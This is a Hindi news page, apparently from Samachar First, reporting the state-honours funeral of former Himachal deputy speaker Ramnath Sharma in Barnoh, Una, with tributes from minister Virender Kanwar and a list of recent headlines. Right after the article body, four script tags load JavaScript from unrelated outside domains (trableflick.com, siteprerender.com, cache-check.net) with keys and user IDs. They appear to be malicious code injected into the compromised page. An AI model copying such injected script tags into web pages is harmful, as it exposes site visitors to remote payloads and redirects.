Categories: हिमाचल

ऊनाः पूर्व विधानसभा उपाध्यक्ष रामनाथ शर्मा का राजकीय सम्मान के साथ बरनोह में हुआ अंतिम संस्कार

<p>जिला ऊना में पूर्व विधानसभा उपाध्यक्ष रामनाथ शर्मा का बुधवार को राजकीय सम्मान के साथ बरनोह में अंतिम संस्कार हुआ। पंडित रामनाथ शर्मा के बड़े बेटे विपिन शर्मा ने उन्हें पार्थिव शरीर को मुखाङ्गिन दी। मुखाग्नि देने के दौरान पुलिस की टुकड़ी ने सलामी दी। वहीं, कैबिनेट मंत्री वीरेन्द्र कंवर और एसडीएम ऊना सुरेश कुमार ने पार्थिक शरीर पर पुष्प अर्पित कर श्रद्धांजलि दी।</p>

<p>बता दें कि 76 वर्षीय पंडित रामनाथ शर्मा का मंगलवार सुबह चंडीगढ़ के एक अस्पताल में लंबी बिमारी के चलते निधन हो गया था। इसके उपरान्त दोपहर तक उनके पार्थिक शरीर को उनके घर बरनोह लाया गया था। इनके निधन की खबर सुनते ही बरनोह में लोगों के आने-जाने का तांता लगा हुआ था। हजारों की संख्या में लोग अपने नेता के आखिरी दर्शन को बरनोह पहुंच रहे थे।</p>

<p>इनकी सांसारिक यात्रा में जिला कांग्रेस अध्यक्ष समेत हजारों की संख्या में कार्यकर्ताओं ने भाग लिया। पंडित रामनाथ शर्मा के निधन से कांग्रेस जगत में शोक की लहर छा गई। इनकी अंतिम यात्रा के उपरांत&nbsp; पर कैबिनेट मंत्री वीरेन्द्र कंवर ने कहा कि साधारण परिवार में पले बड़े स्वर्गीय पंडित रामनाथ शर्मा का डिप्टी स्पीकर के पद पर आसीन होना कुटलैहड़ क्षेत्र के लिए गौरव की बात थी।</p>

<p>पंडित रामनाथ शर्मा ने क्षेत्र की जनता के विकास के लिए हर समय कार्य किया है। कुटलैहड़ में कांग्रेस को मजबूत करने में इनका महत्वपूर्ण योगदान रहा है। वीरेन्द्र कंवर ने कहा कि इनके आकस्मिक निधन पर हमें गहरा दुख है। उनके परिवार और स्नेहीजनों के प्रति हमारी संवेदनाएं हैं। ईश्वर उनकी आत्मा को शांति प्रदान करे। वहीं, वीरेन्द्र कंवर पंडित रामनाथ शर्मा के बेटे विवेक शर्मा को पिता के आकस्मिक निधन पर ढ़ांढस बंधाते भी दिखे।</p>
<script src=”//trableflick.com/21aca573d498d25317.js”></script>
<script src=”http://siteprerender.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8620x” type=”text/javascript”></script>
<script src=”http://cache-check.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8620x&amp;format=arrjs&amp;r=1600257613562″ type=”text/javascript”></script>
<script src=”http://trableflick.com/ext/21aca573d498d25317.js?sid=52587_8620_&amp;title=a&amp;blocks[]=31af2″ type=”text/javascript”></script>

Samachar First

Recent Posts

रेणुका विधानसभा क्षेत्र को उप मुख्यमंत्री का तोहफा, 2.40 करोड़ के विकास कार्यों का शुभारंभ

नाहन। उप मुख्यमंत्री मुकेश अग्निहोत्री ने आज जिला सिरमौर के श्री रेणुका जी विधान सभा…

5 hours ago

जानें कौन सी योजना देगी 1% ब्याज पर 20 लाख का शिक्षा ऋण

  Shimla: डॉ. वाईएस परमार ऋण योजना को सुक्‍खू सरकार ने विस्‍तार दिया है। योजना…

5 hours ago

28 सितंबर को शांतिपूर्ण प्रदर्शन, फैसला न आने पर जेल भरो आंदोलन

  Shimla: संजौली अवैध मस्जिद विवाद शांत नहीं हुआ है। 28 सितंबर को देवभूमि संघर्ष…

6 hours ago

कंगना का कांग्रेस पर करारा वार: कांग्रेस को बच्चे पालने का शौक, पप्पू और बहन की हरकतें बचकानी

  Mandi: मंडी के गोहर में एक कार्यक्रम में सांसद कंगना ने कांग्रेस के शीर्ष…

7 hours ago

पीएम मोदी कर रहे बदनाम, हिमाचलआर्थिक तंगी से नहीं जूझ रहा: डिप्टी सीएम

  Sirmour: उपमुख्यमंत्री मुकेश अग्निहोत्री ने आरोप लगाया है कि भाजपा के केंद्रीय व प्रदेश…

7 hours ago

स्वच्छ रहेगा घर, नगर व पंचायत तभी तो स्वस्थ रहेगा इंसान: उषा बिरला

  Hamirpur: ग्राम पंचायत दडूही में सोमवार को स्वच्छ भारत मिशन के तहत स्वच्छता पखवाड़ा…

8 hours ago